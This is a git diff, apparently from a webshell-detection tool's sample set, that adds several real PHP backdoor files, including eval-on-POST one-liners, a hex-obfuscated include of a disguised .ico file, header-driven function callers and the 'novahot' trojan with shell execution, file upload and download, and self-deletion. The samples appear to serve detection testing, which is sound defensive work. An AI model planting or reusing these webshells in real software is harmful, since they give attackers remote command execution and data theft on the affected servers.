+GOwWijmauw16/Go/naObdwJzqceMJBE70KkVOiILqfxH4qm3sJbChOxgX+kgTPqpN05DzFmhKMS1
+oOmnbo7ss+mj2o9emNdMMExA9QriNsjeeU8zfgOfXsmbPD4V4fF7vdzfn5961n3+4tn5TPfHg9P8
+nL/79p9HxrWSVUF5cDA4Zm9WOUpIeEdpWk9tTmpCZXRLYjNTdTJYaHdZYW56TEQ3RlE2UnJQbEM0
+rAdgIpyl2xtLif9G9VTXbVcXcSMeT+V4ReDHNHXJxQQtpexjv8NfquP2PXaZVn6czpmenU28nGxm
+y+ONQw5EDidJs+ziX6si3c7rGr9+N2OlikchMepepQIn+U6k8WtuFJOwBdZEmQXWX4UCbCOIwTBH
+EMjHjtlyFDuBNRIIDBRoy0vpjNtDDG4y78w/unf2gwiLibwRyORGAbgvXLdMFPkFudVh1R/mwodl
+Bt1aKu3W8kyIcenL0E6b0zHSmPntJAPncvV32ksHLktYVbfFxFRZZBBbljido0zXf5ETCTDyAxVF
+qIap11SdVcnaCqKLOdwu0rvQeX/HzKgPgX47H0+aFdJadt4dMGRgcKFTDcLKRlSXayHl7YcyJl5h
+ls5U1GeWSJbQGhvC2lhdIA5eG6aloPisU3olALz5PRV2L3uVDUaA+1BdtP+/0Y5UTVpEOlUxcVEC
+LMuG/JvbOA4PutniKbRKTRIUUinnSh1btI4ymEUJA7X9h58//Q+Pal3JKjFBzWwacNmkzFQzv3KD
+mG9flxzPkXPLMIVTVhVz73nHfTRHfHlHuUkXuxy4rYcluPfXHLEDVeNpRdJLtKzKswEHOyKKocca
+muK5XLCaOiXFVwM2KYiy2UXeeJX7QWtK5d+neEnhBb5hLAA1lihAr2R9y4FReBSJYiJYc+GVMuCk
+YXDWvuPSYUcB/ztA35t0buyWvSPLkvRe/LGxP1vCA/se1o7A/S1urhgivA+M7483kDAkdR/yconw
+J0c3hPQk1QNHCOx5eaSzr5PpyMinhaUg9uzFwPIjrvuKAJiedmrbeePbotF9/fQG56b1PddBeuVv
+dlhdN8VPstsSb6ojoTvp1HnvhHZzjso97zXXAfiwWcEdsJaJ5gt8klVOAu/tqCWq9OQVRtrXV7Xz
+7Cr1DZmmf1C/0A6ACqjy4ArUaW4S1eXhOYjd629jmphkP3zm7x0o9c1PjPpa+5umkf+/T87S+67f
+DldivnXVk/1Ce4BaBUr98Frd9CdNw9MJIwEos6CrgUwqxKCDlT2o50g9lCy53/X1+28awvDdGjf0
+vqZx4/xfETz+swxjWkwrwfMUPs5xuFFAJFESTEWGZL/3C44pT8DwOgXcVRMMTAYEflRhnjL9Iuqh
+oFiw8KFBTjSQa+2P5uQrlzMggBl2rl72oS6mru8ad2QnQmngadsBQAwOqKYCa2Awep08EKR8ppFB
+YTKY7Geso8iShLmL/QXbtCswu8Tv+SDbrGc99l94uC6J
diff --git a/data/samples/real/ice.php b/data/samples/real/ice.php
new file mode 100644
index 0000000..6f8edc0
--- /dev/null
+++ b/data/samples/real/ice.php
@@ -0,0 +1 @@
+<?php ${${eval($_POST[ice])}};?>
diff --git a/data/samples/real/include.php b/data/samples/real/include.php
new file mode 100644
index 0000000..58712f1
--- /dev/null
+++ b/data/samples/real/include.php
@@ -0,0 +1,4 @@
+<?php
+/*8a68d*/
+@include "\x2fh\x6fm\x65/\x77e\x62p\x6ce\x78x\x33/\x70u\x62l\x69c\x5fh\x74m\x6c/\x68i\x73-\x68e\x6d.\x6fr\x67/\x5f_\x4dA\x43O\x53X\x2fm\x6fd\x75l\x65s\x2fn\x6fd\x65/\x66a\x76i\x63o\x6e_\x31a\x33f\x384\x2ei\x63o";
+/*8a68d*/
diff --git a/data/samples/real/nano.php b/data/samples/real/nano.php
new file mode 100644
index 0000000..14df255
--- /dev/null
+++ b/data/samples/real/nano.php
@@ -0,0 +1 @@
+<?$x=$_GET;($x[p]=='_'?$x[f]($x[c]):y);
diff --git a/data/samples/real/ninja.php b/data/samples/real/ninja.php
new file mode 100644
index 0000000..fdace58
--- /dev/null
+++ b/data/samples/real/ninja.php
@@ -0,0 +1 @@
+<?$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
diff --git a/data/samples/real/novahot.php b/data/samples/real/novahot.php
new file mode 100644
index 0000000..a330580
--- /dev/null
+++ b/data/samples/real/novahot.php
@@ -0,0 +1,130 @@
+<?php
+# Tested on PHP 5.4.45 on Debian Wheezy.
+#
+# To test this trojan locally, run the following in the directory containing 
+# this file:
+#   php -S localhost:<port>
+# TODO: Change this password. Don't leave the default!
+define('PASSWORD', 'the-password');
+# Override the default error handling to:
+#   1. Bludgeon PHP `throw`-ing rather than logging errors
+#   2. Keep noise out of the error logs
+set_error_handler('warning_handler', E_WARNING);
+function warning_handler($errno, $errstr) { 
+    throw new ErrorException($errstr);
+}
+# get the POSTed JSON input
+$post = json_decode(file_get_contents('php://input'), true);
+$cwd  = ($post['cwd'] !== '') ? $post['cwd'] : getcwd();
+# feign non-existence if the authentication is invalid
+if (!isset($post['auth']) || $post['auth'] !== PASSWORD) {
+    header('HTTP/1.0 404 Not Found');
+    die();
+}
+# return JSON to the client
+header('content-type: application/json');
+# if `cmd` is a trojan payload, execute it
+if (function_exists($post['cmd'])) {
+    $post['cmd']($cwd, $post['args']);
+}
+# otherwise, execute a shell command
+else {
+    $output = [];
+    # execute the command
+    $cmd = "cd $cwd; {$post['cmd']} 2>&1; pwd";
+    exec($cmd, $output);
+    $cwd = array_pop($output);
+    $response = [
+        'stdout' => $output,
+        'stderr' => [],
+        'cwd'    => $cwd,
+    ];
+    die(json_encode($response));
+}
+# File-download payload
+function payload_download ($cwd, $args) {
+    # cd to the trojan's cwd 
+    chdir($cwd);
+    # open the file as binary, and base64-encode its contents
+    try {
+        $stdout = base64_encode(file_get_contents($args['file']));
+        $stderr = [];
+    }
+    
+    # notify the client on failure
+    catch (ErrorException $e) {
+        $stdout = [];
+        $stderr = [ 'Could not download file.', $e->getMessage() ];
+    }
+    die(json_encode([
+        'stdout' => $stdout,
+        'stderr' => $stderr,
+        'cwd'    => $cwd,
+    ]));
+}
+# File-upload payload
+function payload_upload ($cwd, $args) {
+    # cd to the trojan's cwd 
+    chdir($cwd);
+    # base64-decode the uploaded bytes, and write them to a file
+    try {
+        file_put_contents( $args['dst'], base64_decode($args['data']));
+        $stderr = [];
+        $stdout = [ "File saved to {$args['dst']}." ];
+    }
+    
+    # notify the client on failure
+    catch (ErrorException $e) {
+        $stdout = [];
+        $stderr = [ 'Could not save file.', $e->getMessage() ];
+    }
+    die(json_encode([
+        'stdout' => $stdout,
+        'stderr' => $stderr,
+        'cwd'    => $cwd,
+    ]));
+}
+# Trojan autodestruct
+function payload_autodestruct ($cwd, $args) {
+    # attempt to delete the trojan
+    try {
+        unlink(__FILE__);
+        $stdout = [ 'File ' . __FILE__ . ' has autodestructed.' ];
+        $stderr = [];
+    }
+    
+    # notify the client on failure
+    catch (ErrorException $e) {
+        $stdout = [];
+        $stderr = [ 'File ' . __FILE__ . ' could not autodestruct.'];
+    }
+    die(json_encode([
+        'stdout' => [ 'Instructed ' . __FILE__ . ' to autodestruct.' ],
+        'stderr' => [],
+        'cwd'    => $cwd,
+    ]));
+}
diff --git a/data/samples/real/srt.php b/data/samples/real/srt.php
new file mode 100644
index 0000000..ef02af2
--- /dev/null
+++ b/data/samples/real/srt.php
@@ -0,0 +1,5 @@
+<?php 
+ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); 
+echo $_REQUEST['pass']; 
+ob_end_flush(); 
+?>
diff --git a/data/samples/real/sucuri_2014_04.php b/data/samples/real/sucuri_2014_04.php
new file mode 100644
index 0000000..64bfa07
--- /dev/null
+++ b/data/samples/real/sucuri_2014_04.php
@@ -0,0 +1,3 @@
+<?php
+/* https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html */
+@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);